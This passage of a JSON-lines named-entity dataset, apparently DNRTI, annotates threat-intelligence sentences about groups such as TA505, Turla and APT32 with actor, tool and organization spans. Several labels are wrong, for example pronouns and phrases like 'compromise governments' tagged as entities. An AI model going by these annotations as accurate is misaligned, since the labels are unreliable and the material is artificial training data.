delivered payloads .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]], "TOOL: delivered payloads": [[134, 152]]}, "info": {"id": "dnrti_train_003471", "source": "dnrti_train"}} {"text": "The main payload is usually Imminent Monitor RAT; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT .", "spans": {"MALWARE: Monitor RAT;": [[37, 49]], "MALWARE: LuminosityLink RAT": [[115, 133]], "MALWARE: NetWire RAT": [[136, 147]], "MALWARE: NjRAT": [[154, 159]]}, "info": {"id": "dnrti_train_003472", "source": "dnrti_train"}} {"text": "But with the West African gang we’ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime .", "spans": {"THREAT_ACTOR: Scattered Canary": [[43, 59]]}, "info": {"id": "dnrti_train_003476", "source": "dnrti_train"}} {"text": "In a recent report , the FBI’s Internet Crime Complaint Center (IC3) reported that more than 20 , 000 businesses lost nearly $1.3 billion to BEC attacks in 2018 .", "spans": {"ORGANIZATION: FBI’s": [[25, 30]]}, "info": {"id": "dnrti_train_003477", "source": "dnrti_train"}} {"text": "This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we’ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business .", "spans": {"ORGANIZATION: Agari Cyber Intelligence": [[26, 50]], "THREAT_ACTOR: group": [[83, 88]], "THREAT_ACTOR: Scattered Canary": [[101, 117]]}, "info": {"id": "dnrti_train_003478", "source": "dnrti_train"}} {"text": "While this criminal organization’s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 .", "spans": {"ORGANIZATION: 
organization’s": [[20, 34]]}, "info": {"id": "dnrti_train_003479", "source": "dnrti_train"}} {"text": "On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer .", "spans": {"THREAT_ACTOR: Scattered Canary": [[24, 40]]}, "info": {"id": "dnrti_train_003480", "source": "dnrti_train"}} {"text": "Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other way .", "spans": {"THREAT_ACTOR: they": [[73, 77]]}, "info": {"id": "dnrti_train_003481", "source": "dnrti_train"}} {"text": "Scattered Canary’s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[0, 18]], "THREAT_ACTOR: group": [[91, 96]]}, "info": {"id": "dnrti_train_003482", "source": "dnrti_train"}} {"text": "By March 2016 , one of Scattered Canary’s members had built enough trust with a romance victim—who we’ll call Jane—that she became a frequent source of new mule accounts for the group .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[23, 41]], "THREAT_ACTOR: group": [[178, 183]]}, "info": {"id": "dnrti_train_003483", "source": "dnrti_train"}} {"text": "By all accounts , late 2015 was the beginning of BEC for Scattered Canary .", "spans": {"THREAT_ACTOR: Scattered Canary": [[57, 73]]}, "info": {"id": "dnrti_train_003485", "source": "dnrti_train"}} {"text": "The first type of attack Scattered Canary pivoted to was credential phishing .", "spans": {"THREAT_ACTOR: Scattered Canary": [[25, 41]]}, "info": {"id": "dnrti_train_003486", "source": "dnrti_train"}} {"text": "Between July 2015 and February 2016 , Scattered Canary’s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[38, 56]]}, "info": {"id": "dnrti_train_003487", 
"source": "dnrti_train"}} {"text": "In the first few months of their credential phishing ventures , Scattered Canary’s sights were mostly set on Asian targets—Malaysia and Japan , in particular .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[64, 82]]}, "info": {"id": "dnrti_train_003488", "source": "dnrti_train"}} {"text": "In November 2015 , the group started to focus on North American users , mostly in the United States .", "spans": {"THREAT_ACTOR: group": [[23, 28]]}, "info": {"id": "dnrti_train_003489", "source": "dnrti_train"}} {"text": "For over eighteen months from March 2017 until November 2018 , Scattered Canary’s frequent enterprise-focused credential phishing campaigns almost exclusively targeted businesses in the United States and Canada .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[63, 81]]}, "info": {"id": "dnrti_train_003491", "source": "dnrti_train"}} {"text": "In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards .", "spans": {"THREAT_ACTOR: Scattered Canary": [[91, 107]]}, "info": {"id": "dnrti_train_003492", "source": "dnrti_train"}} {"text": "Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies .", "spans": {"THREAT_ACTOR: Scattered Canary": [[59, 75]], "ORGANIZATION: state government agencies": [[126, 151]]}, "info": {"id": "dnrti_train_003494", "source": "dnrti_train"}} {"text": "In total , 35 actors have been tied to Scattered Canary’s operations since the group emerged in 2008 .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[39, 57]]}, "info": {"id": "dnrti_train_003495", "source": "dnrti_train"}} {"text": "Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own .", "spans": {"THREAT_ACTOR: actors": [[29, 35]], "TOOL: 
scripts": [[48, 55]], "TOOL: templates": [[60, 69]]}, "info": {"id": "dnrti_train_003496", "source": "dnrti_train"}} {"text": "When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.” These formats are templated text documents that can contain several layers of phishing messages to send to potential victims .", "spans": {"THREAT_ACTOR: Scattered Canary": [[36, 52]]}, "info": {"id": "dnrti_train_003497", "source": "dnrti_train"}} {"text": "If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today’s most pernicious email scams , this report demonstrates that a much more holistic approach—one based on threat actor identity rather than type of fraudulent activity—is required to detect email fraud and protect organizations .", "spans": {"THREAT_ACTOR: Scattered Canary": [[3, 19]]}, "info": {"id": "dnrti_train_003499", "source": "dnrti_train"}} {"text": "It used GitHub and Slack as tools for communication between the malware and its controller .", "spans": {"THREAT_ACTOR: It": [[0, 2]], "TOOL: GitHub": [[8, 14]], "TOOL: Slack": [[19, 24]]}, "info": {"id": "dnrti_train_003506", "source": "dnrti_train"}} {"text": "On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website .", "spans": {"ORGANIZATION: we": [[12, 14]], "THREAT_ACTOR: SLUB": [[43, 47]]}, "info": {"id": "dnrti_train_003507", "source": "dnrti_train"}} {"text": "Since we published out last report on SLUB , the backdoor has been updated and several improvements were implemented .", "spans": {"ORGANIZATION: we": [[6, 8]], "THREAT_ACTOR: SLUB": [[38, 42]], "TOOL: backdoor": [[49, 57]]}, "info": {"id": "dnrti_train_003509", "source": "dnrti_train"}} {"text": "During this attack , we found that the SLUB malware used two Slack teams sales-yww9809” and marketing-pwx7789 .", "spans": {"THREAT_ACTOR: SLUB": [[39, 43]]}, "info": 
{"id": "dnrti_train_003511", "source": "dnrti_train"}} {"text": "SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments .", "spans": {"THREAT_ACTOR: SWEED": [[0, 5]]}, "info": {"id": "dnrti_train_003512", "source": "dnrti_train"}} {"text": "In April 2018 , SWEED began making use of a previously disclosed Office exploit .", "spans": {"THREAT_ACTOR: SWEED": [[16, 21]]}, "info": {"id": "dnrti_train_003513", "source": "dnrti_train"}} {"text": "We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea .", "spans": {"THREAT_ACTOR: them": [[9, 13]]}, "info": {"id": "dnrti_train_003515", "source": "dnrti_train"}} {"text": "TA505 is also using FlowerPippi (Backdoor.Win32.FLOWERPIPPI.A) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "TOOL: FlowerPippi": [[20, 31]], "TOOL: backdoor": [[71, 79]]}, "info": {"id": "dnrti_train_003518", "source": "dnrti_train"}} {"text": "TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]]}, "info": {"id": "dnrti_train_003519", "source": "dnrti_train"}} {"text": "It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload .", "spans": {"THREAT_ACTOR: It": [[0, 2]], "TOOL: FlawedAmmyy payload": [[74, 93]]}, "info": {"id": "dnrti_train_003520", "source": "dnrti_train"}} {"text": "TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "TOOL: Wizard (.wiz) files": [[11, 30]], "TOOL: FlawedAmmyy RAT": [[55, 70]]}, "info": {"id": "dnrti_train_003521", "source": "dnrti_train"}} 
{"text": "On June 14 , we saw TA505’s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet .", "spans": {"THREAT_ACTOR: TA505’s": [[20, 27]], "TOOL: Amadey botnet": [[158, 171]]}, "info": {"id": "dnrti_train_003522", "source": "dnrti_train"}} {"text": "It later delivered an information stealer named EmailStealer , ” which stolesimple mail transfer protocol (SMTP) credentials and email addresses in the victim’s machine .", "spans": {"THREAT_ACTOR: It": [[0, 2]], "TOOL: EmailStealer": [[48, 60]]}, "info": {"id": "dnrti_train_003523", "source": "dnrti_train"}} {"text": "On June 18 , the majority of the campaign’s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note” or Confirmation .", "spans": {}, "info": {"id": "dnrti_train_003524", "source": "dnrti_train"}} {"text": "This campaign used the abovementioned .html file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey .", "spans": {"TOOL: macro": [[85, 90]], "TOOL: FlawedAmmyy payload": [[97, 116]], "TOOL: Amadey": [[123, 129]]}, "info": {"id": "dnrti_train_003525", "source": "dnrti_train"}} {"text": "On June 17 , we observed the campaign’s spam emails delivering malware-embedded Excel files directly as an attachment .", "spans": {}, "info": {"id": "dnrti_train_003527", "source": "dnrti_train"}} {"text": "On June 20 , we spotted the campaign’s spam emails delivering .doc and .xls files .", "spans": {"ORGANIZATION: we": [[13, 15]]}, "info": {"id": "dnrti_train_003528", "source": "dnrti_train"}} {"text": "After our analysis , we found that Proofpoint reported this malware as AndroMut as well .", "spans": {"ORGANIZATION: we": [[21, 23]], "ORGANIZATION: Proofpoint": [[35, 45]], "THREAT_ACTOR: AndroMut": [[71, 79]]}, "info": {"id": "dnrti_train_003530", "source": "dnrti_train"}} {"text": "Another new malware we found that TA505 is using in their campaigns last June 20 
against targets in Japan , the Philippines , and Argentina is FlowerPippi .", "spans": {"THREAT_ACTOR: TA505": [[34, 39]], "TOOL: FlowerPippi": [[143, 154]]}, "info": {"id": "dnrti_train_003532", "source": "dnrti_train"}} {"text": "The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation .", "spans": {"ORGANIZATION: ZLAB": [[76, 80]], "THREAT_ACTOR: TA505": [[190, 195]]}, "info": {"id": "dnrti_train_003533", "source": "dnrti_train"}} {"text": "The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 .", "spans": {"THREAT_ACTOR: TA505": [[110, 115]], "ORGANIZATION: high profile companies": [[231, 253]]}, "info": {"id": "dnrti_train_003534", "source": "dnrti_train"}} {"text": "The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS” software: a legitimate remote administration tool produced by the Russian company TektonIT .", "spans": {"THREAT_ACTOR: TA505": [[61, 66]]}, "info": {"id": "dnrti_train_003535", "source": "dnrti_train"}} {"text": "The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy Email Stealer” part of their arsenal .", "spans": {"THREAT_ACTOR: TA505": [[4, 9]]}, "info": {"id": "dnrti_train_003536", "source": "dnrti_train"}} {"text": "In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod .", "spans": {"ORGANIZATION: Kaspersky": [[10, 19]], "THREAT_ACTOR: Turla": [[60, 65]], "TOOL: PowerShell loader": [[66, 
83]]}, "info": {"id": "dnrti_train_003538", "source": "dnrti_train"}} {"text": "Turla is believed to have been operating since at least 2008 , when it successfully breached the US military .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_003539", "source": "dnrti_train"}} {"text": "This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products .", "spans": {"THREAT_ACTOR: Turla": [[27, 32]], "TOOL: PowerShell": [[42, 52]]}, "info": {"id": "dnrti_train_003540", "source": "dnrti_train"}} {"text": "However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East .", "spans": {"THREAT_ACTOR: Turla": [[88, 93]]}, "info": {"id": "dnrti_train_003541", "source": "dnrti_train"}} {"text": "Based on our research , SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans .", "spans": {"THREAT_ACTOR: SWEED": [[24, 29]]}, "info": {"id": "dnrti_train_003543", "source": "dnrti_train"}} {"text": "It is interesting to note that Turla operators used the free email provider GMX again , as in the Outlook Backdoor and in LightNeuron .", "spans": {"THREAT_ACTOR: Turla": [[31, 36]], "TOOL: Outlook Backdoor": [[98, 114]], "TOOL: LightNeuron": [[122, 133]]}, "info": {"id": "dnrti_train_003544", "source": "dnrti_train"}} {"text": "This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion .", "spans": {"THREAT_ACTOR: Turla": [[59, 64]], "TOOL: frameworks": [[120, 130]]}, "info": {"id": "dnrti_train_003545", "source": "dnrti_train"}} {"text": "One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 .", "spans": {"THREAT_ACTOR: Crambus": [[113, 120]], "THREAT_ACTOR: OilRig": [[125, 131]], 
"THREAT_ACTOR: APT34": [[134, 139]]}, "info": {"id": "dnrti_train_003547", "source": "dnrti_train"}} {"text": "Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose .", "spans": {"THREAT_ACTOR: Waterbug": [[0, 8]], "TOOL: Meterpreter": [[24, 35], [114, 125]]}, "info": {"id": "dnrti_train_003548", "source": "dnrti_train"}} {"text": "In all likelihood , Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover .", "spans": {"THREAT_ACTOR: Waterbug’s": [[20, 30]], "TOOL: Crambus infrastructure": [[38, 60]]}, "info": {"id": "dnrti_train_003549", "source": "dnrti_train"}} {"text": "One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network .", "spans": {"THREAT_ACTOR: Waterbug’s": [[58, 68]], "THREAT_ACTOR: Waterbug": [[152, 160]], "THREAT_ACTOR: group": [[222, 227]]}, "info": {"id": "dnrti_train_003550", "source": "dnrti_train"}} {"text": "These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors .", "spans": {"THREAT_ACTOR: Waterbug": [[19, 27]], "THREAT_ACTOR: group": [[52, 57]], "ORGANIZATION: compromise governments": [[58, 80]], "ORGANIZATION: international organizations": [[85, 112]]}, "info": {"id": "dnrti_train_003551", "source": "dnrti_train"}} {"text": "Curiously though , Waterbug also compromised other computers on the victim’s network using its own infrastructure .", "spans": {"THREAT_ACTOR: Waterbug": [[19, 27]], "ORGANIZATION: infrastructure": [[99, 113]]}, "info": {"id": "dnrti_train_003552", "source": "dnrti_train"}} {"text": 
"Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "TOOL: Mimikatz": [[38, 46]], "THREAT_ACTOR: Waterbug": [[80, 88]]}, "info": {"id": "dnrti_train_003553", "source": "dnrti_train"}} {"text": "Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 .", "spans": {"TOOL: Mimikatz": [[72, 80]]}, "info": {"id": "dnrti_train_003554", "source": "dnrti_train"}} {"text": "The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim’s network .", "spans": {"THREAT_ACTOR: Waterbug": [[31, 39]]}, "info": {"id": "dnrti_train_003555", "source": "dnrti_train"}} {"text": "In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim’s network , with the earliest evidence of activity dating to November 2017 .", "spans": {"THREAT_ACTOR: Crambus": [[62, 69]]}, "info": {"id": "dnrti_train_003556", "source": "dnrti_train"}} {"text": "Waterbug’s intrusions on the victim’s network continued for much of 2018 .", "spans": {"THREAT_ACTOR: Waterbug’s": [[0, 10]]}, "info": {"id": "dnrti_train_003557", "source": "dnrti_train"}} {"text": "Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point. 
also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Waterbug": [[82, 90], [194, 202]], "ORGANIZATION: Crambus infrastructure": [[221, 243]], "TOOL: PsExec tool": [[362, 373]]}, "info": {"id": "dnrti_train_003558", "source": "dnrti_train"}} {"text": "Waterbug also used an older version of PowerShell , likely to avoid logging .", "spans": {"THREAT_ACTOR: Waterbug": [[0, 8]], "TOOL: PowerShell": [[39, 49]]}, "info": {"id": "dnrti_train_003559", "source": "dnrti_train"}} {"text": "In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest .", "spans": {"THREAT_ACTOR: Waterbug": [[28, 36]], "TOOL: USB stealer": [[44, 55]]}, "info": {"id": "dnrti_train_003560", "source": "dnrti_train"}} {"text": "The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary .", "spans": {"ORGANIZATION: DeepSight Managed Adversary": [[4, 31]], "ORGANIZATION: Threat Intelligence": [[36, 55]], "THREAT_ACTOR: Waterbug": [[210, 218]], "ORGANIZATION: group": [[247, 252]]}, "info": {"id": "dnrti_train_003562", "source": "dnrti_train"}} {"text": "The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary .", "spans": {"ORGANIZATION: DeepSight MATI team": [[4, 23]], "THREAT_ACTOR: Waterbug": [[163, 171]], "THREAT_ACTOR: group": [[200, 205]]}, "info": {"id": "dnrti_train_003563", "source": "dnrti_train"}} {"text": "While reviewing a 2015 
report⁵ of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti⁶ samples designed specifically for Linux⁷ .", "spans": {"THREAT_ACTOR: Winnti": [[36, 42]], "ORGANIZATION: Vietnamese gaming company": [[58, 83]], "THREAT_ACTOR: Winnti⁶": [[119, 126]]}, "info": {"id": "dnrti_train_003564", "source": "dnrti_train"}} {"text": "Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged .", "spans": {"ORGANIZATION: Chronicle": [[26, 35]], "THREAT_ACTOR: Winnti": [[118, 124]]}, "info": {"id": "dnrti_train_003565", "source": "dnrti_train"}} {"text": "We will see more from Zebrocy into 2019 on government and military related organizations .", "spans": {"THREAT_ACTOR: Zebrocy": [[22, 29]], "ORGANIZATION: government": [[43, 53]]}, "info": {"id": "dnrti_train_003568", "source": "dnrti_train"}} {"text": "The FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data .", "spans": {"ORGANIZATION: FBI": [[4, 7]], "THREAT_ACTOR: group": [[48, 53]], "THREAT_ACTOR: APT6": [[60, 64]], "ORGANIZATION: US government": [[77, 90]]}, "info": {"id": "dnrti_train_003571", "source": "dnrti_train"}} {"text": "FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 .", "spans": {"ORGANIZATION: FireEye iSIGHT": [[0, 14]], "THREAT_ACTOR: APT37": [[42, 47]], "THREAT_ACTOR: Scarcruft": [[98, 107]], "THREAT_ACTOR: Group123": [[112, 120]]}, "info": {"id": "dnrti_train_003572", "source": "dnrti_train"}} {"text": "Trend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: MuddyWater": [[40, 50]], "THREAT_ACTOR: actor": [[67, 72]]}, "info": {"id": "dnrti_train_003573", "source": 
"dnrti_train"}} {"text": "FireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: actors": [[24, 30]], "THREAT_ACTOR: TEMP.Reaper": [[115, 126]]}, "info": {"id": "dnrti_train_003574", "source": "dnrti_train"}} {"text": "FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: TEMP.Hermit": [[72, 83]]}, "info": {"id": "dnrti_train_003575", "source": "dnrti_train"}} {"text": "Kaspersky reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: APT33": [[23, 28]], "THREAT_ACTOR: group": [[42, 47]]}, "info": {"id": "dnrti_train_003577", "source": "dnrti_train"}} {"text": "APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: Kaspersky": [[29, 38]], "TOOL: DROPSHOT dropper": [[60, 76]]}, "info": {"id": "dnrti_train_003578", "source": "dnrti_train"}} {"text": "The cyber espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 .", "spans": {"THREAT_ACTOR: APT32": [[26, 31], [115, 120]], "TOOL: backdoors": [[57, 66]], "TOOL: scripts": [[71, 78]]}, "info": {"id": "dnrti_train_003579", "source": "dnrti_train"}} {"text": "In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group .", "spans": {"ORGANIZATION: Mandiant": [[7, 15]], "THREAT_ACTOR: FIN7": [[129, 133]]}, "info": {"id": "dnrti_train_003580", "source": "dnrti_train"}} {"text": "Kaspersky released a similar report about the same group under the name 
Carbanak in February 2015 .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: group": [[51, 56]], "THREAT_ACTOR: Carbanak": [[72, 80]]}, "info": {"id": "dnrti_train_003581", "source": "dnrti_train"}} {"text": "FireEye assesses that APT32 leverages a unique suite of fully-featured malware .", "spans": {"ORGANIZATION: FireEye": [[0, 7]]}, "info": {"id": "dnrti_train_003582", "source": "dnrti_train"}} {"text": "FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing , consumer products , and hospitality sectors .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[21, 26]], "ORGANIZATION: Vietnam’s manufacturing": [[84, 107]]}, "info": {"id": "dnrti_train_003583", "source": "dnrti_train"}} {"text": "The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions .", "spans": {"ORGANIZATION: FireEye": [[4, 11]], "ORGANIZATION: iSIGHT": [[12, 18]], "ORGANIZATION: Mandiant": [[115, 123]], "THREAT_ACTOR: APT32": [[142, 147]]}, "info": {"id": "dnrti_train_003584", "source": "dnrti_train"}} {"text": "FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[22, 27]], "ORGANIZATION: Vietnamese": [[68, 78]], "ORGANIZATION: government": [[79, 89]]}, "info": {"id": "dnrti_train_003585", "source": "dnrti_train"}} {"text": "In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government .", "spans": {"ORGANIZATION: FireEye": [[23, 30]], "THREAT_ACTOR: APT19": [[65, 70]], "THREAT_ACTOR: group": [[75, 80]], "ORGANIZATION: Chinese government": [[164, 182]]}, "info": {"id": "dnrti_train_003586", "source": "dnrti_train"}} {"text": "APT10 is a Chinese cyber espionage group that 
FireEye has tracked since 2009 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "THREAT_ACTOR: FireEye": [[46, 53]]}, "info": {"id": "dnrti_train_003587", "source": "dnrti_train"}} {"text": "In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers .", "spans": {"ORGANIZATION: FireEye ISIGHT Intelligence": [[35, 62]], "THREAT_ACTOR: APT10": [[76, 81]]}, "info": {"id": "dnrti_train_003588", "source": "dnrti_train"}} {"text": "FireEye’s visibility into the operations of APT28 – a group we believe the Russian government sponsors – has given us insight into some of the government’s targets , as well as its objectives and the activities designed to further them .", "spans": {"ORGANIZATION: FireEye’s": [[0, 9]], "THREAT_ACTOR: APT28": [[44, 49]], "ORGANIZATION: Russian government": [[75, 93]]}, "info": {"id": "dnrti_train_003589", "source": "dnrti_train"}} {"text": "FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT28": [[33, 38]]}, "info": {"id": "dnrti_train_003590", "source": "dnrti_train"}} {"text": "In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group .", "spans": {"ORGANIZATION: FireEye": [[16, 23]], "THREAT_ACTOR: APT30": [[59, 64]]}, "info": {"id": "dnrti_train_003591", "source": "dnrti_train"}} {"text": "FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers .", "spans": {"ORGANIZATION: FireEye iSIGHT": [[0, 14]], "THREAT_ACTOR: Vendetta Brothers": [[95, 112]]}, "info": {"id": "dnrti_train_003592", "source": "dnrti_train"}} {"text": "McAfee concludes that some groups—and especially the Poetry Group —have shifted tactics to use Citadel in ways other than what it was originally intended for .", "spans": {"ORGANIZATION: McAfee": [[0, 
6]], "THREAT_ACTOR: Group": [[60, 65]]}, "info": {"id": "dnrti_train_003594", "source": "dnrti_train"}} {"text": "In November 2017 , Talos observed the Group123 , which included a new version of ROKRAT being used in the latest wave of attacks .", "spans": {"ORGANIZATION: Talos": [[19, 24]], "THREAT_ACTOR: Group123": [[38, 46]]}, "info": {"id": "dnrti_train_003596", "source": "dnrti_train"}} {"text": "In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel .", "spans": {"ORGANIZATION: TALOS": [[15, 20]], "THREAT_ACTOR: DarkHotel": [[101, 110]]}, "info": {"id": "dnrti_train_003597", "source": "dnrti_train"}} {"text": "ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "TOOL: PowerShell scripts": [[23, 41]], "THREAT_ACTOR: Turla": [[56, 61]]}, "info": {"id": "dnrti_train_003599", "source": "dnrti_train"}} {"text": "Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government .", "spans": {"ORGANIZATION: Symantec": [[15, 23]], "ORGANIZATION: government": [[96, 106]]}, "info": {"id": "dnrti_train_003601", "source": "dnrti_train"}} {"text": "Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Waterbug": [[54, 62]]}, "info": {"id": "dnrti_train_003602", "source": "dnrti_train"}} {"text": "Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor .", "spans": {"ORGANIZATION: Microstep Intelligence Bureau": [[19, 48]], "ORGANIZATION: Ukrainian government": [[100, 120]], "THREAT_ACTOR: Gamaredon": [[148, 157]]}, "info": {"id": "dnrti_train_003603", "source": "dnrti_train"}} {"text": "Kaspersky found an active 
campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: SixLittleMonkeys": [[66, 82]], "TOOL: Microcin Trojan": [[114, 129]], "TOOL: RAT": [[136, 139]]}, "info": {"id": "dnrti_train_003604", "source": "dnrti_train"}} {"text": "Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: BlackTech": [[87, 96]]}, "info": {"id": "dnrti_train_003605", "source": "dnrti_train"}} {"text": "LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East .", "spans": {"THREAT_ACTOR: LuckyMouse": [[0, 10]], "ORGANIZATION: Palo Alto": [[32, 41]], "TOOL: web shells": [[76, 86]], "ORGANIZATION: government organizations": [[123, 147]]}, "info": {"id": "dnrti_train_003606", "source": "dnrti_train"}} {"text": "Talos published its analysis of the BlackWater campaign , related to MuddyWater group .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: MuddyWater": [[69, 